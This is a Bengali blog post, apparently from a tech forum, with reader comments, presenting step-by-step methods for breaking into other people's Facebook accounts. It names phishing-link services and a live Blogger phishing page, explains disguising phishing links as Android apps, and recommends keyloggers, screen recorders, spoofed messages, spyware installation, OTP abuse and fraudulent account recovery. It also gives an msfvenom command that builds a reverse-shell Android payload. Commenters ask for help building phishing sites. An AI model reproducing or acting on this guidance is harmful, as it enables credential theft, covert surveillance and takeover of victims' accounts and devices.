জগতে মানুষের মনকে যেহেতু বশ(হ্যাক) করা সম্ভব তাই নিশ্চিত রূপে জেনে থাকুন যে সাইবার জগতে সবকিছু হ্যাক করা সম্ভব (তবে এখানে সহজ আর কঠিন কথাটা মাথায় রাখা উচিত) সুতরাং ১০০% গ্যারান্টি দিলে বলা যায় “ফেসবুক হ্যাক পসিবল”।
ফেসবুক হ্যাক বলতে বোঝায়
(১) সরাসরি ফেসবুক সার্ভার হ্যাক
(২) অন্যের ফেসবুক আইডি হ্যাক
আসুন একটু ডিটেইলস ডিসকাস করা যাক
(১) ফেসবুক সার্ভার হ্যাক: ফেসবুক যেহেতু একটি ওয়েবসাইট তাই এতে ভার্নাবিলিটি( দূর্বলতা) থাকা স্বাভাবিক আর হ্যাকারেরা এই সিকিউরিটির ফাঁকে প্রতিনিয়ত ফেসবুক আইডি হ্যাক করার চেষ্টা করছে। ঠিক এই মুহূর্তে আমি যখন এই আর্টিকেল লিখছি তখন বিশ্বের হাজার তরুণ হ্যাকার ফেসবুক সার্ভারে এট্যাক করার চেষ্টা করছে। তবে জনপ্রিয় ফেসবুক ওয়েবসাইটের অথোরিটি তাদের সিকিউরিটি এতোটাই শক্তিশালী করার চেষ্টারত আছেন যে তাতে প্রায় ৯৯.৯৯% হ্যাকারই বিফল হন সেটা তো বলাই বাহুল্য।
আর সবচেয়ে মজার কথা হলো ফেসবুকের সিকিউরিটির অন্যতম এক্সপার্ট হলো পৃথিবীর বেশ নামী দামী হ্যাকারেরা তাই এখানে “চোর যখন পাহারদার তখন দায়িত্বই হলো ঈমানদারী” তাই এক্ষেত্রে ফেসবুক হ্যাক প্রায় অসম্ভব( রিপিট আমি প্রায় বলেছি)।
(২) অন্যের ফেসবুক আইডি হ্যাক: এই কাজটা যারপরনাই সহজ আবার সচেতন ভিক্টিম(যার আইডি হ্যাক করতে চান তিনিই ভিক্টিম) এর ক্ষেত্রে খুবই কঠিন। ফেসবুক একাউন্ট হ্যাক করার কতোগুলা মেথড আছে সেগুলি নিম্নরূপ:
(ক) ফিশিং: যেকোনো ওয়েবসাইট এর নকল পেইজ তৈরী করে ভিক্টিম’কে পাঠিয়ে তাতে লগিন করতে পাম্পিং করার নামই ফিশিং। পূর্বে ওয়াপকাতে সহজভাবে ফেসবুক ফিশিং সাইট তৈরী করা গেলেও বর্তমানে ওয়াপকা ফিশিং সাইট ব্লক করে দেয়। তবে একইভাবে আপনি যেকোনো ফ্রি হোস্টিং সাইট হতে এমন ফিশিং সাইট তৈরী করতে পারেন যেমন www.000webhost.com ইত্যাদি। এছাড়াও অনলাইনে আপনি www.anomor.com অথবা www.shadowave.com ( www.shadowave.info) কিংবা http://z-shadow.info হতে একটি একাউন্ট খুলে সেখান হতে ফিশিং লিংক সংগ্রহ করে ভিক্টিমকে পাঠাতে পারেন এবং ভিক্টিম যদি তাতে লগিন করে তবে আপনার ঐ একাউন্টে তার ইউসার ডিটেইলস(যেমন ইউজার আইডি/ইমেইল) এবং পাসওয়ার্ড পেয়ে যাবেন।
যেহেতু এখন সবাই ফিশিং সম্পর্কে সাম্যক অবগত তাই আপনি উক্ত ফিশিং লিংক হতে একটি এনড্রোয়েড এপ্স বানিয়ে নিতে পারেন যেন ভিক্টিম সরাসরি লিংক’টি সনাক্ত করতে না পারেন।এরকম লিংক হতে এপ্স কনভার্ট করতে পারেন www.web2apk.com কিংবা https://gonative.io/ ইত্যাদি হতে।
(খ) কিলগার: মূলত ভিক্টিমের সকল টাইপিং লেটার পাওয়ার উপায় হলো এই কি লগার যেন ভিক্টিম কি কি টাইপ করছে তা আপনি জানতে পারেন আর ভিক্টিম যদি ফেসবুকে লগিন করে তবে পাসওয়ার্ড টাইপিং করার সময় তা ডিভাইসে(পিসি/মোবাইল) এ সেভ করে রাখার সিস্টেমই হলো কিলগিং।
ধরুন আপনি আপনার ফ্রেন্ডকে বললেন আপনার মোবাইলে অনেক মেগাবাইট আছে সে যেন চাইলে ফেসবুক একাউন্ট ব্যবহার করতে পারে তাহলে আপনার বন্ধু যখন প্রলুব্ধ হয়ে তার একাউন্টে লগিন করবে তখন আপনার ডিভাইসে তার লগিন করা পাসওয়ার্ড সেভ হয়ে থাকবে।
এমনি একটি কিলগার হলো Hackers Keyboard → https://m.apkpure.com/hacker-s-keyboard/org.pocketworkstation.pckeyboard
দিনে দিনে সিকিউরিটি যতো বাড়বে হ্যাকিং ওয়্যেও ততোই বাড়বে।
(গ) স্ক্রিন রেকর্ডার: ঠিক কি লগারের মতোই এমন একটি মেথড হলো স্ক্রিন রেকর্ডার যেখানে ভিক্টিম ডিভাইসে কি করছে তা সরাসরি ভিডিও রেকর্ড হয়ে থাকবে আর সেখান হতেই পাসওয়ার্ড সংগ্রহ করে তার ফেসবুক একাউন্ট হ্যাক করতে পারবেন।
এমনি স্ক্রিন রেকর্ডার এপ্স( রুট+ননরুট) AZ Screen Recorder → https://m.apkpure.com/az-screen-recorder-no-root/com.hecorat.screenrecorder.free
(ঘ) স্ক্রিন শেয়ারিং: ভিক্টিম তার মোবাইলে কি কি করছে তা আপনি দূর হতেই লাইভ দেখতে পারেন স্ক্রিন শেয়ারিং সফটওয়ার হতে; কার্যত এভাবে ভিক্টিমের ফেসবুক আইডির এক্সেস নিতে কিংবা ডিটেইলস জানতে পারেন।
এটি মূলত ইন্টারনেট সংযোগের উপর ভিত্তি করে ভিক্টিম ডিভাইস এবং রিসিভার এর মাঝের তথ্য আদান প্রদান করে আর ফেসবুক চালাতে যেহেতু ইন্টারনেট সংযোগ বাধ্যতামূলক তাই এই পদ্ধতিটি অবলম্বন করা যেতেই পারে( উল্লেখ্য এক্ষেত্রে দুটি ডিভাইসেই একই সফটওয়ার ইনস্টল থাকা বাধ্যতামূলক)।
এমন একটি এপ্স হলো screen Sharing → https://m.apkpure.com/screen-share-oneassistant/nfo.oneassist
(ঙ) স্ফুপিং: ধরুন আপনার মোবাইল যদি সরাসরি ফেসবুক হতে একটি আসে যে ” keep safe your account from hacker by clicking this link http://blablablablabla.com” তাহলে নিশ্চয়ই আপনি তাতে ক্লিক করে দ্বিধাবোধ করবেন না কেননা মেসেজটি তো সরাসরি ফেসবুক হতে এসেছে তাইনা?
ঠিক এভাবে আপনি উক্ত http://blablablablabla.com এর স্থলে ফিশিং লিংক হতে ভিক্টিম আইডির এক্সেস নিতে পারবেন।
এক্ষেত্রে ঐ Facebook হতে আসা মেসেজটি হলো আদতে বাল্ক মেসেজ আর এটাকে আসলে মেসেজ স্পুফিং একইরূপ আপনি ইমেইল স্পুফিং কিংবা কল স্পুফিংও করতে পারেন।
(চ) আইপি এড্রেস: ফেসবুক আইডি হ্যাক করার অন্যতম একটি সহজ উপায় হলো এই আইপি এড্রেস। মূলত আপনার আইপি এড্রেস এবং পোর্ট হতে নিম্নোক্ত কমান্ডে $ruby msfvenom -p android/meterpreter/reverse_tcp LHOST=your ip LPORT=port R > /sdcard/test.apk (পিসি হলে লিনাক্স বা উইন্ডোজ এবং এনড্রোয়েড হলে টার্মিনাল) একটি ম্যালওয়েল( মূলত এনড্রোয়েড রিমোটিক এক্সেস)এপ্স বানাতে পারেন যা হতে আপনি ভিক্টিমের এনড্রোয়েডের এক্সেস নিয়ে তা হ্যাক করতে পারবেন।
(ছ) রিমোটিক এক্সেস: হ্যাকার ভিক্টিমের কম্পিউটার/এনড্রোয়েড রিমোটিক এক্সেস নিয়ে তার ফেসবুক আইডি হ্যাক করতে পারেন। মোবাইলের ক্ষেত্রে আপনি নিম্নোক্ত https://web.airdroid.com/ ওয়েবসাইট এর সহায়তায় ভিক্টিম এনড্রোয়েডে আপনি একটি স্পাইয়িং সফটওয়ার ইনস্টল এবং রেজিস্টার করে পরবর্তীতে পাসওয়ার্ড রিসেট করে আপনার একাউন্ট হতে মেসেজ বক্সে আসা রিসেট কোড সংগ্রহ করে তার ফেসবুক একাউন্ট হ্যাক করতে পারেন।
(জ) ওয়ান টাইম পাসওয়ার্ড: ভিক্টিমের ফেসবুকে যুক্ত থাকা মোবাইল নাম্বার হতে আপনি otp লিখে 32665 নাম্বারে মেসেজ করলে ফিরতি মেসেজে একটি টেম্পরারি কোড পাবেন যা হতে ভিক্টিমের একাউন্টে এক্সেস নিতে পারবেন।
উল্লেখ্য এইখানে তার আইডিতে যুক্ত মোবাইল নাম্বারটি জানতে হবে এবং অতি অল্প সময়ের জন্য হলেও সেই নাম্বারটি ব্যবহার করার মতোন অবসর পেতে হবে।
(ঝ) ব্রুটফোর্স: ফেসবুকে যেহেতু ইমেইল আইডি/মোবাইল নাম্বার না জেনেও সরাসরি আইডি কোড/ইউসারনেম এবং পাসওয়ার্ড দিয়ে লগিন করা যায় তাই ফেসবুকে ব্রুটফোর্স এট্যাক খুবই পপুলার হতো; তবে যেহেতু ক্যাপচা সিস্টেম আছে তাই ব্রুটফোর্স কার্যত অচল। তথাপি গেসিং মেথডে ম্যানুয়ালি ভিক্টিম আইডিতে একের পর এক চেষ্টা চালিয়ে গেলে সফলতা আসতে পারে; এক্ষেত্রে পাসওয়ার্ড লিস্ট আপনাকে ভিক্টিম সম্পর্কে তথ্য জেনে তা এনালাইসিস পূর্বক তৈরী করে নিতে জানতে হবে।
আশ্চর্য হলেও সত্য এই কাজটা যেমন সহজ তেমনি ফলপ্রদ তবে আপনার ব্রেইন’কে কঠিন চিজ তৈরী করাটা আপনার দায়িত্ব।
(ঞ) রিকোভারী: ফেসবুকে অন্যের বার্থডে এবং নাম জেনে ডকুমেন্ট সাবমিট করে তাতে এক্সেস নেবার নামই রিকোভারী; আদতে এমন এক্সেস নেবার জন্যই রিকোভারী হতে তা হ্যাকিং নামে পরিচিত। এক্ষেত্রে এমন ডকুমেন্ট সাবমিট করতে হবে যেন তাতে ভিক্টিমের নাম+বার্থডে মিল থাকে( ফেসবুক গ্রহণ করে এমন ডকুমেন্টের ভেতর আছে ন্যাশনাল আইডি কার্ড/পাসপোর্ট/ড্রাইভিং লাইসেন্স ইত্যাদি)। উল্লেখ্য এমনিভাবে করতে অবশ্যই আপনাকে ভিক্টিম সিস্টেমের সহিত আপনার Mac এক্সচেঞ্জ করে নেওয়া উচিত।
(চ) সেশন হাইজ্যাকিং: ভিক্টিমের একই নেটওয়ার্কে তার ব্রাউজারের কুকিজ হাইজ্যাক করে সরাসরি ফেসবুকে এক্সেস নেওয়ার নামই হলো সেশন হাইজ্যাকিং। বর্তামনে ফেসবুক https:// প্রটোকল ব্যবহার করে এবং http:// রিডিরেক্ট হয় https:// প্রটোকলে তাই এমনটি বর্তমানে অসম্ভব তাই একসময়ের এতো পপুলার ফেসনিফ এপ্স আসলে অকার্যকর। তথাপি একই নেটওয়ার্কে এক্টিভ থাকা দুটি সিস্টেমের একটির ব্রাউজারের কুকিজ হতে ভিন্ন ব্রাউজারে তার কুকিজ হাইজ্যাক করে( সেশন হাইজ্যাক করে) কমপ্লেক্সি হ্যাকিং সম্ভবপর।
শেষকথা: হ্যাকিং বিদ্যার শেষ নাই তবুও আজ হতেই যদি হ্যাকিং শিক্ষার শুরু করেন তবে সফল যে আপনি হবেন-ই-হবেন তা সুনিশ্চিত; সময়টা আজ অথবা কাল তবে শিক্ষা কখনো বিফলে যায়না।
[পূর্বে টিটিসিতে প্রকাশিত আমার লেখা, যার প্রুফ ট্রিকবিডি সাপোর্ট টিম যাচাই করতে পারেন আমার টিউনার আইডির এক্সেস হতে ]
ধন্যবাদ
দারুণ লাগল।
আর শ্রীঘই ‘রিকোভারী’ সম্পর্কে পোস্টটা করেন।
হ্যাক না করতে পাড়লেও হ্যাকিং এর মজা নেওয়া যাবে।
Ar wapka to bondo hoye jasse to ata kibabe wordpress e phising site banabo sei somporke help koren
৬ য়ের অপেক্ষায় আছি,,
আপনি হয়তো জানেন যে আপনি যদি ওয়াইফাই ব্যতীত সীম প্রোভাইডারের ডাটা প্লান ব্যবহার করেন তবে সাব আইপি পেয়ে থাকেন যা হতে আপনার রিয়েল আইডি হলো R-S-R হয়ে থাকে ;অর্থাৎ একটি আইপি রেঞ্জে সাব আইপি নিয়ত বদলায়। ভাইয়া এটা ভিপিএন তো নয় তবে আপনার আসল আইপিও ঠিক প্রকাশ পায়না। আর প্রকৃত এ্যানোনিমাস হতে আপনাকে পেইড ভিপিএন ব্যবহার করার পরামর্শ দেওয়া হলো।
আর ভাইয়া, আপনি Bangladeshi proxy লিখে গুগল সার্চ করেও আপনি বাংলাদেশি ফ্রি প্রক্সি ব্যবহার করতে পারেন [সেটিং করে নিয়েন]
আর নেট একটু স্লো হবে এটা মেনে নিতেই হবে তবে সার্ভার কন্ডিশন বুঝে চয়েজ করলে আশা করি উপকৃত হতে পারবেন
শুনলাম ওয়াপকা নাকি বন্ধ হয়ে যাবে ।
কিভাবে একটি ফিশিং সাইট বানাব প্লিজ একটু হেল্প করেন ।
তবে দেখুন ব্লগার দ্বারা তৈরী ফিশিং পেইজ
https://phishboook.blogspot.com/?m=1
কাউকে লগিন করার জন্য নিষেক করা হইলো যদিও এটা শুরুতে লিখেই দিয়েছি।
আসলে হ্যাকিং করতে দামী দামী কম্পিউটার লাগেনা লাগে শুধু মেধা আর একটু বিকল্প ভাবনার মতোন চিন্তাশক্তি।
আর হ্যা, এমব্রোড করা কোড যেথায় হোস্ট করা হয়েছে সেখানে লগিন ইনফো পাবেন।
ধন্যবাদ
চেষ্টা কইরেন সাবলীল বাংলা দেওয়ার জন্য আর
সাধু ভাষা না দিলে ভালো হই চলিত ভাষা ব্যবহার কইরেন
আর কিছু শব্দ ব্যবহার করতাছেন যেগুলা অর্থ বোঝা কুঠিন হচ্ছে
ভাই আপনাকে ধন্যবাদ
আমি হ্যাকার না হতে পারি কিন্তু কিভাবে হ্যাকার থেকে রক্ষা পাওয়া যায় সেটা ত জানতাছি
আগে নিজে সুরক্ষিত হওয়া
তারপর হ্যাকার হওয়া
ধন্যবাদ ভাই